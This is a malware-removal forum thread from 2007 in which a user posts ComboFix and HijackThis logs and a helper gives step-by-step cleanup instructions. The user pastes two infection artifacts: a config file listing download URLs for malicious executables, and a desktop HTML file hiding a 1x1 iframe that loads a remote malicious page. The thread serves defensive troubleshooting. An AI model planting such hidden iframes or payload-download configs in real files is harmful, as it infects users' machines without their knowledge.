O23 - Service: OKI OPHD DCS Loader - Oki Data Corporation - C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\OPHDLDCS.EXE
O23 - Service: SNMP Trap Service (SNMPTRAP) - Unknown owner - C:\WINDOWS\system32\snmptrap.exe (file missing)





ETA: I tried putting my computer into standby mode, but it kept coming back on, and then proceeded to spin the hard discs. Gah. I've shut it down completely for the moment, not knowing what it's trying to do. *sigh*

 

Well, there is only one file in that directory. The name is "qudasulu." It has no extension, and the last modify date is listed as 6/4/07. Here is the contents:


[VSL]

TopURL=http://apps.deskwizz.com/GetAd/TEK67Top.txt
BottomURL=http://apps.deskwizz.com/GetAd/TEK67Bottom.txt

NoAdURL=http://apps.deskwizz.com/GetAd/NoUrlAd.txt


ShowEvery=5

Add1=http://k8l.info/ax/qwr67.exe
AfterAdd1=http://www.top-banners.com/tmc/to.php?id=ttci&Pu=VTTC
Add2=http://k8l.info/ax/WpAJTrYf67HazytRD.exe
AfterAdd2=http://www.top-banners.com/tmc/to.php?id=VSLYL

AfterInstall=http://ads.k8l.info/advertpro/servlet/view/dynamic/url/zone?zid=114&pid=67



I did a search for "rtemehdofse.html" and the file apparently has been quarantined here:

C:\QooBox\Quarantine\C\Program Files\MSN Gaming Zone\rtemehdofse.html.vir

Here is the contents of that file:



<HTML>
<head>

</head>

<BODY>
<center>

<iframe src= "http://k8l.info/actdkpubid67.html" width=1 height=1 >

</BODY>
</HTML>


I downloaded the PS uninstaller (OiUninstaller.exe) and ran it. I then ran HJT, checked off the "02 - BHO: (no name)...." line in HJT and it went away. I then ran ComboFix and HJT again after that. The file/command line has come back and the black borders on the desktop items remain. Here are the latest reports from ComboFix and HJT:


"Owner" - 2007-06-06 10:41:56 Service Pack 2 NTFS
ComboFix 07-06-3 - Running from: "C:\Documents and Settings\All Users\Documents\ "


((((((((((((((((((((((((( Files Created from 2007-05-06 to 2007-06-06 )))))))))))))))))))))))))))))))


2007-06-05 23:16 <DIR> d-------- C:\Program Files\Enigma Software Group
2007-06-04 17:15 49,152 --a------ C:\WINDOWS\nircmd.exe
2007-06-04 13:31 10,872 --a------ C:\WINDOWS\system32\drivers\AvgAsCln.sys
2007-06-04 10:12 54,784 --a------ C:\WINDOWS\rugowok.exe
2007-06-04 10:12 421,920 -r-hs---- C:\WINDOWS\okmbdnrA.exe
2007-06-04 10:12 416,352 -r-hs---- C:\WINDOWS\rugowokA.exe
2007-06-04 10:12 <DIR> d-------- C:\WINDOWS\system32\TQ0
2007-06-04 10:12 <DIR> d-------- C:\WINDOWS\system32\T9
2007-06-04 10:12 <DIR> d-------- C:\WINDOWS\system32\T7
2007-06-04 10:12 <DIR> d-------- C:\WINDOWS\system32\T6
2007-06-04 10:12 <DIR> d-------- C:\Program Files\myCleanerPC
2007-06-04 10:11 <DIR> d-------- C:\WINDOWS\system32\T1QaSQ
2007-06-04 10:11 <DIR> d-------- C:\Temp\x2b
2007-06-04 10:11 <DIR> d-------- C:\Temp


(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))

2007-06-04 20:59:04 -------- d-----w C:\Program Files\MSN Gaming Zone
2007-06-04 14:51:47 -------- d-----w C:\Program Files\Lavasoft Ad-aware
2007-06-04 14:12:36 -------- d-----w C:\Program Files\Messenger
2007-05-15 17:59:06 12,622 -c--a-w C:\WINDOWS\mozver.dat
2007-04-29 15:05:46 -------- d-----w C:\DOCUME~1\Owner\APPLIC~1\MailWasher
2007-03-15 16:23:16 497,496 ----a-w C:\WINDOWS\system32\XceedZip.dll
2007-03-15 16:19:58 526,184 ----a-w C:\WINDOWS\system32\XceedCry.dll


((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))


*Note* empty entries & legit default entries are not shown

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects]
{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}=C:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx [2001-03-02 22:02]
{5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897}=C:\Program Files\Yahoo!\Common\yiesrvc.dll [2005-05-26 11:38]
{65D886A2-7CA7-479B-BB95-14D1EFB7946A}=C:\Program Files\Yahoo!\Common\YIeTagBm.dll [2005-01-24 09:55]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"nwiz "= "nwiz.exe" [2004-10-29 17:50 C:\WINDOWS\system32\nwiz.exe]
"CamMonitor "= "c:\Program Files\Hewlett-Packard\Digital Imaging\Unload\hpqcmon.exe" [2002-06-18 02:11]
"KBD "= "C:\HP\KBD\KBD.EXE" [2001-07-07 00:56]
"checktime "= "c:\program files\HPSelect\Frontend\ct.exe" [2002-01-26 16:05]
"StorageGuard "= "C:\Program Files\VERITAS Software\Update Manager\sgtray.exe" [2002-05-09 11:01]
"AlcxMonitor "= "ALCXMNTR.EXE" [2004-09-07 13:47 C:\WINDOWS\ALCXMNTR.EXE]
"QuickTime Task "= "C:\Program Files\QuickTime\qttask.exe" [2005-12-05 21:33]
"RemoteControl "= "C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe" [2004-11-02 21:24]
"SpyHunter "=" " []

[HKEY_CURRENT_USER\software\microsoft\internet explorer\desktop\components\0]
Source= C:\Program Files\MSN Gaming Zone\rtemehdofse.html
FriendlyName=

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
"{57B86673-276A-48B2-BAE7-C6DBB3020EB8} "= "C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\shellexecutehook.dll" [2007-05-30 08:29]

HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost *netsvcs*


Contents of the 'Scheduled Tasks' folder
2007-06-06 14:39:33 C:\WINDOWS\tasks\Symantec NetDetect.job

**************************************************************************

catchme 0.3.692 W2K/XP/Vista - userland rootkit detector by Gmer, http://www.gmer.net
Rootkit scan 2007-06-06 10:44:30
Windows 5.1.2600 Service Pack 2 NTFS

scanning hidden processes ...

scanning hidden autostart entries ...

scanning hidden files ...

**************************************************************************

Completion time: 2007-06-06 10:45:44
C:\ComboFix-quarantined-files.txt ... 2007-06-06 10:45
C:\ComboFix2.txt ... 2007-06-06 10:14

--- E O F ---



Logfile of HijackThis v1.99.1
Scan saved at 10:46:11 AM, on 6/6/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe
C:\WINDOWS\System32\nvsvc32.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\XiMeta\NetDisk\LDServ.exe
C:\Program Files\Hewlett-Packard\Digital Imaging\Unload\hpqcmon.exe
C:\HP\KBD\KBD.EXE
C:\Program Files\QuickTime\qttask.exe
C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe
C:\Program Files\XiMeta\NetDisk\Admin.exe
C:\WINDOWS\system32\wscntfy.exe
C:\WINDOWS\explorer.exe
C:\Program Files\HijackThis\jakers.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://srch-us6.hpwis.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.comcast.net
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://srch-us6.hpwis.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = http://srch-us6.hpwis.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://srch-us6.hpwis.com/
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = localhost
N3 - Netscape 7: user_pref( "browser.startup.homepage ", "http://www.google.com/ "); (C:\Documents and Settings\Owner\Application Data\Mozilla\Profiles\default\1sgmifpi.slt\prefs.js)
N3 - Netscape 7: user_pref( "browser.search.defaultengine ", "engine://C%3A%5CProgram%20Files%5CNetscape%5CNetscape%5Csearchplugins%5CSBWeb_02.src "); (C:\Documents and Settings\Owner\Application Data\Mozilla\Profiles\default\1sgmifpi.slt\prefs.js)
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx
O2 - BHO: UberButton Class - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O2 - BHO: YahooTaggedBM Class - {65D886A2-7CA7-479B-BB95-14D1EFB7946A} - C:\Program Files\Yahoo!\Common\YIeTagBm.dll
O2 - BHO: (no name) - {C68AE9C0-0909-4DDC-B661-C1AFB9F5AE53} - (no file)
O3 - Toolbar: hp toolkit - {B2847E28-5D7D-4DEB-8B67-05D28BCF79F5} - C:\HP\EXPLOREBAR\HPTOOLKT.DLL
O3 - Toolbar: &NetDisk Tools - {6BB8F8F1-EFD5-45A0-87BA-74A0E7AFD10B} - C:\Program Files\XiMeta\NetDisk\Drivers\NDExpTool.dll
O3 - Toolbar: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dll
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [CamMonitor] c:\Program Files\Hewlett-Packard\Digital Imaging\Unload\hpqcmon.exe
O4 - HKLM\..\Run: [KBD] C:\HP\KBD\KBD.EXE
O4 - HKLM\..\Run: [checktime] c:\program files\HPSelect\Frontend\ct.exe
O4 - HKLM\..\Run: [StorageGuard] "C:\Program Files\VERITAS Software\Update Manager\sgtray.exe" /r
O4 - HKLM\..\Run: [AlcxMonitor] ALCXMNTR.EXE
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [RemoteControl] "C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe "
O4 - Global Startup: NetDisk Administrator.lnk = C:\Program Files\XiMeta\NetDisk\Admin.exe
O8 - Extra context menu item: &Yahoo! Search - file:///C:\Program Files\Yahoo!\Common/ycsrch.htm
O8 - Extra context menu item: Yahoo! &Dictionary - file:///C:\Program Files\Yahoo!\Common/ycdict.htm
O8 - Extra context menu item: Yahoo! &Maps - file:///C:\Program Files\Yahoo!\Common/ycmap.htm
O8 - Extra context menu item: Yahoo! &SMS - file:///C:\Program Files\Yahoo!\Common/ycsms.htm
O9 - Extra button: Net2Phone - {4B30061A-5B39-11D3-80F8-0090276F843F} - C:\Program Files\Net2Phone\Net2fone.exe
O9 - Extra 'Tools' menuitem: Net2Phone - {4B30061A-5B39-11D3-80F8-0090276F843F} - C:\Program Files\Net2Phone\Net2fone.exe
O9 - Extra button: Yahoo! Services - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O9 - Extra button: ICQ - {6224f700-cba3-4071-b251-47cb894244cd} - C:\Program Files\ICQ\ICQ.exe
O9 - Extra 'Tools' menuitem: ICQ - {6224f700-cba3-4071-b251-47cb894244cd} - C:\Program Files\ICQ\ICQ.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O12 - Plugin for .spop: C:\Program Files\Internet Explorer\Plugins\NPDocBox.dll
O14 - IERESET.INF: START_PAGE_URL=http://www.comcast.net
O16 - DPF: {41F17733-B041-4099-A042-B518BB6A408C} - http://apple.speedera.net/qtinstall.info.apple.com/borris/us/win/QuickTimeInstaller.exe
O20 - Winlogon Notify: igfxcui - C:\WINDOWS\SYSTEM32\igfxsrvc.dll
O20 - Winlogon Notify: WgaLogon - C:\WINDOWS\SYSTEM32\WgaLogon.dll
O23 - Service: AVG Anti-Spyware Guard - GRISOFT s.r.o. - C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: NetDisk Service (NetDisk_Service) - Unknown owner - C:\Program Files\XiMeta\NetDisk\LDServ.exe
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\System32\nvsvc32.exe
O23 - Service: OKI OPHD DCS Loader - Oki Data Corporation - C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\OPHDLDCS.EXE
O23 - Service: SNMP Trap Service (SNMPTRAP) - Unknown owner - C:\WINDOWS\system32\snmptrap.exe (file missing)



For what it's worth, I have no interest in on-line gaming of any kind. Anything that ditches MSN Gaming Zone and related directories and prevents their contents from returning is fine by me.

Thank you again for your continued help.

 

I deleted the file, but I can't delete the directory as it says it's "in use." I did delete the files in the subdirectory itself, but they return on reboot.

Done, and done. The files have returned, along with the associated problem.

The desktop wallpaper weirdness seems to be a symptom of whatever it is that we can't get rid of. The wallpaper file hasn't changed, though to be sure I changed selected wallpaper images and the black borders are still there. It's like a glitch in the proggie. The borders change slightly as I move icons around the desktop. As I said, I think it's just a symptom of the larger problem, but I'll know when the latter is gone when the desktop returns to its normal, non glitchy self.

Here ya go:

Winlogon:
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UIHost
logonui.exeWindows Logon UI Microsoft Corporation c:\windows\system32\logonui.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify
crypt32chainCrypto API32 Microsoft Corporation c:\windows\system32\crypt32.dll
cryptnetCrypto Network Related API Microsoft Corporation c:\windows\system32\cryptnet.dll
cscdllOffline Network Agent Microsoft Corporation c:\windows\system32\cscdll.dll
igfxcuiigfxsrvc Module Intel Corporation c:\windows\system32\igfxsrvc.dll
ScCertPropCommon DLL to receive Winlogon notifications Microsoft Corporation c:\windows\system32\wlnotify.dll
ScheduleCommon DLL to receive Winlogon notifications Microsoft Corporation c:\windows\system32\wlnotify.dll
sclgntfySecondary Logon Service Notification DLL Microsoft Corporation c:\windows\system32\sclgntfy.dll
SensLognCommon DLL to receive Winlogon notifications Microsoft Corporation c:\windows\system32\wlnotify.dll
termsrvCommon DLL to receive Winlogon notifications Microsoft Corporation c:\windows\system32\wlnotify.dll
WgaLogonWindows Genuine Advantage Notification Microsoft Corporation c:\windows\system32\wgalogon.dll
wlballoonCommon DLL to receive Winlogon notifications Microsoft Corporation c:\windows\system32\wlnotify.dll


Applnit:
(nothing is listed under this tab)


Unknown Publishers under the Everything tab:
HKLM\System\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\StartupPrograms
rdclip File not found: rdclip

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
CamMonitorHpqCmon MFC Application c:\program files\hewlett-packard\digital imaging\unload\hpqcmon.exe
checktime c:\program files\hpselect\frontend\ct.exe

HKCU\SOFTWARE\Microsoft\Internet Explorer\Desktop\Components
0 File not found: C:\Program Files\MSN Gaming Zone\rtemehdofse.html
1 File not found: About:Home

HKCU\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved
Web Folders c:\program files\common files\microsoft shared\web folders\msonsext.dll

HKLM\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved
Display Panning CPL Extension File not found: deskpan.dll
WinRAR shell extension c:\program files\winrar\rarext.dll

HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
AcroIEHlprObj ClassAcroIEHelper Module c:\program files\adobe\acrobat 5.0\reader\activex\acroiehelper.ocx

HKLM\System\CurrentControlSet\Services
NetDisk_Service c:\program files\ximeta\netdisk\ldserv.exe (This one is legit - Pat)

HKLM\System\CurrentControlSet\Services
AVG Anti-Spyware Driver c:\program files\grisoft\avg anti-spyware 7.5\guard.sys
SecdrvSafeDisc driver c:\windows\system32\drivers\secdrv.sys
TnIDriver File not found: C:\DOCUME~1\Owner\LOCALS~1\Temp\tni705.tmp

 

Please do as instructed below in the order presented.

Access your Add or Remove Programs Control Panel by hitting your [Start] button, select Control Panel and click on Add or Remove Programs. Then find the following programs and click the [Change|Remove] button for each, if they are listed. If they are not, continue with instructions
SpyHunter\EnigmaSoftware Group


Download Atribunes ATF Cleaner

• Double-click ATF-Cleaner.exe to run the program.
• Tick the following boxes:
  • Windows Temp
  • Current User Temp
  • All User Temp
  • Cookies<<<---By deleting your cookies, you will have to re-enter any passwords and log-in info for any sites you are usually required to do so with.
  • Temporary Internet Files
  • History
  • Prefetch
  • Java Cache
• Click the [Empty Selected] button.

We'll empty the Recycle Bin later, once we know you're all cleaned up and nothing needs to be restored.


Download the Killbox from here and save it to the desktop.

• Double-click the KillBox icon on your desktop to open it
• Select "Delete on Reboot "
• Then select "All files ".

Copy the file names below to the clipboard by highlighting them and pressing Control-C:
C:\WINDOWS\rugowok.exe
C:\WINDOWS\okmbdnrA.exe
C:\WINDOWS\rugowokA.exe

Return to Killbox

• Go to the File menu, and choose "Paste from Clipboard ".
• Click the red-and-white [Delete File] button.
• Click "Yes" at the Delete on Reboot prompt. Click "No" at the 'Pending Operations' prompt.

Do not reboot.

Run HJT, and place a check next to the following lines, then, with all browsers and windows closed, hit 'Fix checked':

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://srch-us6.hpwis.com/

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://srch-us6.hpwis.com/

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = http://srch-us6.hpwis.com/

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://srch-us6.hpwis.com/


O2 - BHO: (no name) - {C68AE9C0-0909-4DDC-B661-C1AFB9F5AE53} - (no file)


Reboot and run ComboFix first, then HJT and post both logs back into this thread.

 

I think we're making a little progress, but that one "02" line item keeps coming back, and the MSN Gaming Zone directory still says it's in use and can't be deleted. Sub directory files are still being recreated, and desktop icons are still glitchy.

Whatever it is, it's happening right after the first Windows Welcome splash screen. A new screen takes its place but merely says "Welcome." And then the same pattern of dropped wallpaper to black happens, followed by a return of the wallpaper with glitchy desktop icons and black borders.

Anyhoo, here are the logs after previous steps were taken:



"Owner" - 2007-06-06 19:16:17 Service Pack 2 NTFS
ComboFix 07-06-3 - Running from: "C:\Documents and Settings\All Users\Documents\ "


((((((((((((((((((((((((( Files Created from 2007-05-06 to 2007-06-06 )))))))))))))))))))))))))))))))


2007-06-06 19:00 <DIR> d-------- C:\!KillBox
2007-06-05 23:16 <DIR> d-------- C:\Program Files\Enigma Software Group
2007-06-04 17:15 49,152 --a------ C:\WINDOWS\nircmd.exe
2007-06-04 13:31 10,872 --a------ C:\WINDOWS\system32\drivers\AvgAsCln.sys
2007-06-04 10:12 421,920 --------- C:\WINDOWS\okmbdnrA.exe
2007-06-04 10:12 <DIR> d-------- C:\WINDOWS\system32\TQ0
2007-06-04 10:12 <DIR> d-------- C:\WINDOWS\system32\T9
2007-06-04 10:12 <DIR> d-------- C:\WINDOWS\system32\T7
2007-06-04 10:12 <DIR> d-------- C:\WINDOWS\system32\T6
2007-06-04 10:12 <DIR> d-------- C:\Program Files\myCleanerPC
2007-06-04 10:11 <DIR> d-------- C:\WINDOWS\system32\T1QaSQ
2007-06-04 10:11 <DIR> d-------- C:\Temp\x2b
2007-06-04 10:11 <DIR> d-------- C:\Temp


(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))

2007-06-06 19:30:19 -------- d-----w C:\Program Files\MSN Gaming Zone
2007-06-04 14:51:47 -------- d-----w C:\Program Files\Lavasoft Ad-aware
2007-06-04 14:12:36 -------- d-----w C:\Program Files\Messenger
2007-05-15 17:59:06 12,622 -c--a-w C:\WINDOWS\mozver.dat
2007-04-29 15:05:46 -------- d-----w C:\DOCUME~1\Owner\APPLIC~1\MailWasher
2007-03-15 16:23:16 497,496 ----a-w C:\WINDOWS\system32\XceedZip.dll
2007-03-15 16:19:58 526,184 ----a-w C:\WINDOWS\system32\XceedCry.dll


((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))


*Note* empty entries & legit default entries are not shown

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects]
{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}=C:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx [2001-03-02 22:02]
{5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897}=C:\Program Files\Yahoo!\Common\yiesrvc.dll [2005-05-26 11:38]
{65D886A2-7CA7-479B-BB95-14D1EFB7946A}=C:\Program Files\Yahoo!\Common\YIeTagBm.dll [2005-01-24 09:55]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"nwiz "= "nwiz.exe" [2004-10-29 17:50 C:\WINDOWS\system32\nwiz.exe]
"CamMonitor "= "c:\Program Files\Hewlett-Packard\Digital Imaging\Unload\hpqcmon.exe" [2002-06-18 02:11]
"KBD "= "C:\HP\KBD\KBD.EXE" [2001-07-07 00:56]
"checktime "= "c:\program files\HPSelect\Frontend\ct.exe" [2002-01-26 16:05]
"StorageGuard "= "C:\Program Files\VERITAS Software\Update Manager\sgtray.exe" [2002-05-09 11:01]
"AlcxMonitor "= "ALCXMNTR.EXE" [2004-09-07 13:47 C:\WINDOWS\ALCXMNTR.EXE]
"QuickTime Task "= "C:\Program Files\QuickTime\qttask.exe" [2005-12-05 21:33]
"RemoteControl "= "C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe" [2004-11-02 21:24]

[HKEY_CURRENT_USER\software\microsoft\internet explorer\desktop\components\0]
Source= C:\Program Files\MSN Gaming Zone\rtemehdofse.html
FriendlyName=

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
"{57B86673-276A-48B2-BAE7-C6DBB3020EB8} "= "C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\shellexecutehook.dll" [2007-05-30 08:29]

HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost *netsvcs*


Contents of the 'Scheduled Tasks' folder
2007-06-06 23:15:17 C:\WINDOWS\tasks\Symantec NetDetect.job

**************************************************************************

catchme 0.3.692 W2K/XP/Vista - userland rootkit detector by Gmer, http://www.gmer.net
Rootkit scan 2007-06-06 19:19:48
Windows 5.1.2600 Service Pack 2 NTFS

scanning hidden processes ...

scanning hidden autostart entries ...

scanning hidden files ...

**************************************************************************

Completion time: 2007-06-06 19:21:01
C:\ComboFix-quarantined-files.txt ... 2007-06-06 19:20
C:\ComboFix2.txt ... 2007-06-06 16:18
C:\ComboFix3.txt ... 2007-06-06 16:14

--- E O F ---



Logfile of HijackThis v1.99.1
Scan saved at 7:21:35 PM, on 6/6/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe
C:\Program Files\Hewlett-Packard\Digital Imaging\Unload\hpqcmon.exe
C:\HP\KBD\KBD.EXE
C:\Program Files\QuickTime\qttask.exe
C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe
C:\WINDOWS\System32\nvsvc32.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\XiMeta\NetDisk\Admin.exe
C:\Program Files\XiMeta\NetDisk\LDServ.exe
C:\WINDOWS\system32\wscntfy.exe
C:\WINDOWS\explorer.exe
C:\Program Files\HijackThis\jakers.exe

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.comcast.net
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = localhost
N3 - Netscape 7: user_pref( "browser.startup.homepage ", "http://www.google.com/ "); (C:\Documents and Settings\Owner\Application Data\Mozilla\Profiles\default\1sgmifpi.slt\prefs.js)
N3 - Netscape 7: user_pref( "browser.search.defaultengine ", "engine://C%3A%5CProgram%20Files%5CNetscape%5CNetscape%5Csearchplugins%5CSBWeb_02.src "); (C:\Documents and Settings\Owner\Application Data\Mozilla\Profiles\default\1sgmifpi.slt\prefs.js)
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx
O2 - BHO: UberButton Class - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O2 - BHO: YahooTaggedBM Class - {65D886A2-7CA7-479B-BB95-14D1EFB7946A} - C:\Program Files\Yahoo!\Common\YIeTagBm.dll
O2 - BHO: (no name) - {C68AE9C0-0909-4DDC-B661-C1AFB9F5AE53} - (no file)
O3 - Toolbar: hp toolkit - {B2847E28-5D7D-4DEB-8B67-05D28BCF79F5} - C:\HP\EXPLOREBAR\HPTOOLKT.DLL
O3 - Toolbar: &NetDisk Tools - {6BB8F8F1-EFD5-45A0-87BA-74A0E7AFD10B} - C:\Program Files\XiMeta\NetDisk\Drivers\NDExpTool.dll
O3 - Toolbar: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dll
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [CamMonitor] c:\Program Files\Hewlett-Packard\Digital Imaging\Unload\hpqcmon.exe
O4 - HKLM\..\Run: [KBD] C:\HP\KBD\KBD.EXE
O4 - HKLM\..\Run: [checktime] c:\program files\HPSelect\Frontend\ct.exe
O4 - HKLM\..\Run: [StorageGuard] "C:\Program Files\VERITAS Software\Update Manager\sgtray.exe" /r
O4 - HKLM\..\Run: [AlcxMonitor] ALCXMNTR.EXE
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [RemoteControl] "C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe "
O4 - Global Startup: NetDisk Administrator.lnk = C:\Program Files\XiMeta\NetDisk\Admin.exe
O8 - Extra context menu item: &Yahoo! Search - file:///C:\Program Files\Yahoo!\Common/ycsrch.htm
O8 - Extra context menu item: Yahoo! &Dictionary - file:///C:\Program Files\Yahoo!\Common/ycdict.htm
O8 - Extra context menu item: Yahoo! &Maps - file:///C:\Program Files\Yahoo!\Common/ycmap.htm
O8 - Extra context menu item: Yahoo! &SMS - file:///C:\Program Files\Yahoo!\Common/ycsms.htm
O9 - Extra button: Net2Phone - {4B30061A-5B39-11D3-80F8-0090276F843F} - C:\Program Files\Net2Phone\Net2fone.exe
O9 - Extra 'Tools' menuitem: Net2Phone - {4B30061A-5B39-11D3-80F8-0090276F843F} - C:\Program Files\Net2Phone\Net2fone.exe
O9 - Extra button: Yahoo! Services - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O9 - Extra button: ICQ - {6224f700-cba3-4071-b251-47cb894244cd} - C:\Program Files\ICQ\ICQ.exe
O9 - Extra 'Tools' menuitem: ICQ - {6224f700-cba3-4071-b251-47cb894244cd} - C:\Program Files\ICQ\ICQ.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O12 - Plugin for .spop: C:\Program Files\Internet Explorer\Plugins\NPDocBox.dll
O14 - IERESET.INF: START_PAGE_URL=http://www.comcast.net
O16 - DPF: {41F17733-B041-4099-A042-B518BB6A408C} - http://apple.speedera.net/qtinstall.info.apple.com/borris/us/win/QuickTimeInstaller.exe
O20 - Winlogon Notify: igfxcui - C:\WINDOWS\SYSTEM32\igfxsrvc.dll
O20 - Winlogon Notify: WgaLogon - C:\WINDOWS\SYSTEM32\WgaLogon.dll
O23 - Service: AVG Anti-Spyware Guard - GRISOFT s.r.o. - C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: NetDisk Service (NetDisk_Service) - Unknown owner - C:\Program Files\XiMeta\NetDisk\LDServ.exe
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\System32\nvsvc32.exe
O23 - Service: OKI OPHD DCS Loader - Oki Data Corporation - C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\OPHDLDCS.EXE
